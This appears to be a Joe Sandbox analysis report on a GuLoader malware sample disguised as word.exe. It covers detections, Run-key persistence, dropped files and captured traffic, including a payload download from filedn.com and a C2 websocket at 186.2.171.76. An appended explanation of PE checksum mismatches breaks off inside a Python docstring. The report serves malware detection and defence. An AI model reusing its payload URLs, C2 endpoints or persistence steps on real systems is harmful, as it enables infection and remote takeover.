
Windows Analysis Report
word.exe

Overview

General Information

Sample name: word.exe
Analysis ID: 1497467
MD5: 0ea4553778672b58bbd711fb039552c8
SHA1: 8487f359428f19444696ce610ed81c6b4dd56a6a
SHA256: 910ae266eb8177aa46e2a2c77029e57b30d7aaa819c3b8451514bf1b1ae26f8d

Detection

GuLoader
Score: 54
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected GuLoader
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion NT Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • word.exe (PID: 9140 cmdline: "C:\Users\user\Desktop\word.exe" MD5: 0EA4553778672B58BBD711FB039552C8)
    • word.exe (PID: 8792 cmdline: "C:\Users\user\Desktop\word.exe" MD5: 0EA4553778672B58BBD711FB039552C8)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Yara matches on dropped files (Source | Rule | Description | Author):
C:\Users\user\spherosome\preadoption\preembodiment\Unending.die | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
C:\Users\user\AppData\Local\Temp\nsh912A.tmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security

Yara matches on memory dumps (Source | Rule | Description | Author):
00000000.00000002.1794654590.0000000003100000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000015.00000002.5953667909.00000000016D0000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000000.00000002.1794245028.00000000028E0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000000.00000002.1794654590.0000000006E40000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Sigma match. Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\word.exe, ProcessId: 8792, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Run

Suricata alert:
Timestamp: 2024-08-22T16:13:35.638517+0200
SID: 2803270
Severity: 2
Source Port: 49794
Destination Port: 443
Protocol: TCP
Classtype: Potentially Bad Traffic

              AV Detection

Source: C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exe | Joe Sandbox ML: detected
Source: word.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\word.exe | Code function: 21_2_00151B78 CryptQueryObject
Source: C:\Users\user\Desktop\word.exe | Code function: 21_2_00151B77 CryptQueryObject
Source: word.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: word.exe | Static PE information: certificate valid
Source: unknown | HTTPS traffic detected: 74.120.9.25:443 -> 192.168.11.20:49794 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 186.2.171.76:443 -> 192.168.11.20:49795 version: TLS 1.2
Source: word.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\word.exe | Code function: 0_2_00405FF5 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\word.exe | Code function: 0_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\word.exe | Code function: 0_2_00402645 FindFirstFileA
Source: C:\Users\user\Desktop\word.exe | Code function: 21_2_00402645 FindFirstFileA
Source: C:\Users\user\Desktop\word.exe | Code function: 21_2_00405FF5 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\word.exe | Code function: 21_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\word.exe | Code function: 4x nop then jmp 0015CB01h 21_2_0015B43C
Source: C:\Users\user\Desktop\word.exe | Code function: 4x nop then jmp 0015CCA9h 21_2_0015B43C
Source: C:\Users\user\Desktop\word.exe | Code function: 4x nop then mov eax, dword ptr [ebp-34h] 21_2_00153265
Source: C:\Users\user\Desktop\word.exe | Code function: 4x nop then mov eax, dword ptr [ebp-34h] 21_2_0015255C
Source: C:\Users\user\Desktop\word.exe | Code function: 4x nop then jmp 0015BB5Ch 21_2_00154CE4
Source: C:\Users\user\Desktop\word.exe | Code function: 4x nop then jmp 0015BB5Bh 21_2_00154CE4
Source: C:\Users\user\Desktop\word.exe | Code function: 4x nop then mov eax, dword ptr [ebp-28h] 21_2_00154CE4
Source: global traffic | HTTP traffic detected: GET /agent.ashx HTTP/1.1 | Host: 186.2.171.76 | Upgrade: websocket | Connection: Upgrade | Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ== | Sec-WebSocket-Version: 13 | Sec-WebSocket-Extensions: permessage-deflate; client_no_context_takeover
Source: Joe Sandbox View | IP Address: 186.2.171.76
Source: Joe Sandbox View | JA3 fingerprint: c12f54a3f91dc7bafd92cb59fe009a35
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49794 -> 74.120.9.25:443
Source: global traffic | HTTP traffic detected: GET /lusLFydzKAeHl6DYixtUVg8/OdwulMHhYKs243.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: filedn.com | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 186.2.171.76 (reported 9 times)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /lusLFydzKAeHl6DYixtUVg8/OdwulMHhYKs243.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: filedn.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /agent.ashx HTTP/1.1 | Host: 186.2.171.76 | Upgrade: websocket | Connection: Upgrade | Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ== | Sec-WebSocket-Version: 13 | Sec-WebSocket-Extensions: permessage-deflate; client_no_context_takeover
Source: global traffic | DNS traffic detected: DNS query: filedn.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Referrer-Policy: no-referrer | X-XSS-Protection: 1; mode=block | X-Content-Type-Options: nosniff | Content-Security-Policy: default-src 'none'; script-src 'self' 'nonce-aaD1X7EAHdjb4ROQfLpG'; img-src 'self'; style-src 'self' 'nonce-aaD1X7EAHdjb4ROQfLpG'; | Content-Type: text/html; charset=utf-8 | Content-Length: 2551 | ETag: W/"9f7-Mp+Fx3llRl+T15vdlmej7Jb+VGo" | Set-Cookie: xid=e30=; path=/; samesite=lax; secure; httponly | Set-Cookie: xid.sig=BzUgfgjtGT50YZcFx1QzksALeKi6x4FkK-W1U0iWT-1Ab08e5FW08ZvU_ej4h5aG; path=/; samesite=lax; secure; httponly | Vary: Accept-Encoding | Date: Thu, 22 Aug 2024 14:13:46 GMT | Connection: close
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://certificate.crt/
Source: word.exe, 00000015.00000002.5970737373.0000000007866000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://certificate.crt/localhosthttp://localhost/7
Source: word.exe, 00000015.00000002.5970737373.0000000007866000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://certificate.crt/localhostsihttp://localhost/o
Source: word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: word.exe, word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: word.exe, 00000000.00000000.860411221.0000000000409000.00000008.00000001.01000000.00000003.sdmp, word.exe, 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmp, word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsps.ssl.com0
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsps.ssl.com0?
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsps.ssl.com0_
Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://186.2.171.76/agent.ashx
Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://186.2.171.76/agent.ashx$
Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://186.2.171.76/agent.ashxP
Source: word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ssl.com/repository0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown | Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown | HTTPS traffic detected: 74.120.9.25:443 -> 192.168.11.20:49794 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 186.2.171.76:443 -> 192.168.11.20:49795 version: TLS 1.2
Source: C:\Users\user\Desktop\word.exe | Code function: 0_2_0040511A GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\word.exe | Code function: 0_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\word.exe | Code function: 21_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\word.exe | File created: C:\Windows\resources\0409
Source: C:\Users\user\Desktop\word.exe | Code function: 0_2_00404959
Source: C:\Users\user\Desktop\word.exe | Code function: 0_2_004062CB
Source: C:\Users\user\Desktop\word.exe | Code function: 21_2_00404959
Source: C:\Users\user\Desktop\word.exe | Code function: 21_2_004062CB
Source: C:\Users\user\Desktop\word.exe | Code function: 21_2_0015B43C
Source: C:\Users\user\Desktop\word.exe | Code function: 21_2_001516B1
Source: C:\Users\user\Desktop\word.exe | Code function: 21_2_00150808
Source: C:\Users\user\Desktop\word.exe | Code function: 21_2_00150898
Source: C:\Users\user\Desktop\word.exe | Code function: 21_2_00154E10
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exe 910AE266EB8177AA46E2A2C77029E57B30D7AAA819C3B8451514BF1B1AE26F8D
Source: C:\Users\user\Desktop\word.exe | Code function: String function: 004029FD appears 47 times
Source: word.exe, 00000000.00000000.860475916.0000000000447000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename trichinization.exe4 vs word.exe
Source: word.exe, 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename trichinization.exe4 vs word.exe
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename trichinization.exe4 vs word.exe
Source: word.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine | Classification label: mal54.troj.evad.winEXE@3/10@1/2
Source: C:\Users\user\Desktop\word.exe | Code function: 0_2_0040442A GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,LdrInitializeThunk,SetDlgItemTextA
Source: C:\Users\user\Desktop\word.exe | Code function: 0_2_00402036 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,LdrInitializeThunk
Source: C:\Users\user\Desktop\word.exe | File created: C:\Users\user\spherosome
Source: C:\Users\user\Desktop\word.exe | Mutant created: \Sessions\1\BaseNamedObjects\MeshCentralAssistantSingletonMutex
Source: C:\Users\user\Desktop\word.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\word.exe | File created: C:\Users\user\AppData\Local\Temp\nsh9129.tmp
Source: word.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\word.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\word.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\word.exe | File read: C:\Users\user\Desktop\word.exe
Source: unknown | Process created: C:\Users\user\Desktop\word.exe "C:\Users\user\Desktop\word.exe"
Source: C:\Users\user\Desktop\word.exe | Process created: C:\Users\user\Desktop\word.exe "C:\Users\user\Desktop\word.exe"
Source: C:\Users\user\Desktop\word.exe | Process created: C:\Users\user\Desktop\word.exe "C:\Users\user\Desktop\word.exe"
Source: C:\Users\user\Desktop\word.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: ncryptprov.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: netfxperf.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: pdh.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: bitsperf.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: bitsproxy.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: esentprf.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: perfts.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: winsta.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: utildll.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: tdh.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: samcli.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: msdtcuiu.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: atl.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: msdtcprx.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: mtxclu.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: clusapi.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: resutils.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: ktmw32.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: msscntrs.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: perfdisk.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: wmiclnt.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: perfnet.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: browcli.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: perfos.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: perfproc.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: sysmain.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: rasctrs.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: tapiperf.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: perfctrs.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: usbperf.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: tquery.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: cryptdll.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\word.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\word.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\word.exe | File written: C:\Users\user\AppData\Local\Temp\Setup.ini
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\word.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: word.exe | Static PE information: certificate valid
Source: word.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

Source: Yara match :: File source: 00000000.00000002.1794654590.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000000.00000002.1794654590.0000000003100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000015.00000002.5953667909.00000000016D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: 00000000.00000002.1794245028.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match :: File source: C:\Users\user\spherosome\preadoption\preembodiment\Unending.die, type: DROPPED
Source: Yara match :: File source: C:\Users\user\AppData\Local\Temp\nsh912A.tmp, type: DROPPED
Source: C:\Users\user\Desktop\word.exe :: Code function: 0_2_0040601C GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_0040601C
Source: System.dll.0.dr :: Static PE information: real checksum: 0x0 should be: 0x1014f
Source: word.exe :: Static PE information: real checksum: 0xb3966 should be: 0xb47c4
Source: Julenissen.exe.21.dr :: Static PE information: real checksum: 0xb3966 should be: 0xb47c4
Source: C:\Users\user\Desktop\word.exe :: Code function: 0_2_10002D30 push eax; ret 0_2_10002D5E
Source: C:\Users\user\Desktop\word.exe :: Code function: 21_2_0015275A pushad ; retf 37DBh 21_2_0015277D
Source: C:\Users\user\Desktop\word.exe :: File created: C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exe
Source: C:\Users\user\Desktop\word.exe :: File created: C:\Users\user\AppData\Local\Temp\nsy9448.tmp\System.dll
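Added example, not part of the Joe Sandbox report: the "real checksum ... should be ..." entries above are produced by recomputing IMAGE_OPTIONAL_HEADER.CheckSum over the whole file. A stored value of 0x0 (System.dll) means the linker never set it, which is common and not suspicious by itself; a non-zero stored value that still mismatches (word.exe, and Julenissen.exe, which reports the identical pair of values and is consistent with being a copy of the sample) means the bytes changed after the checksum was written, typically by packing or patching. Windows does not enforce the field for ordinary user-mode images, so treat a mismatch as a triage flag rather than proof. The script below implements the documented CheckSumMappedFile arithmetic (ones'-complement sum of 16-bit words, skipping the CheckSum field itself, plus the file length) and runs it over a headers-only PE32 image it constructs itself; the image, the function names and the constants are the example's own.

```python
"""PE CheckSum recomputation, the check behind "real checksum ... should be ..." findings.

Added example, not part of the report. The minimal image built by build_minimal_pe()
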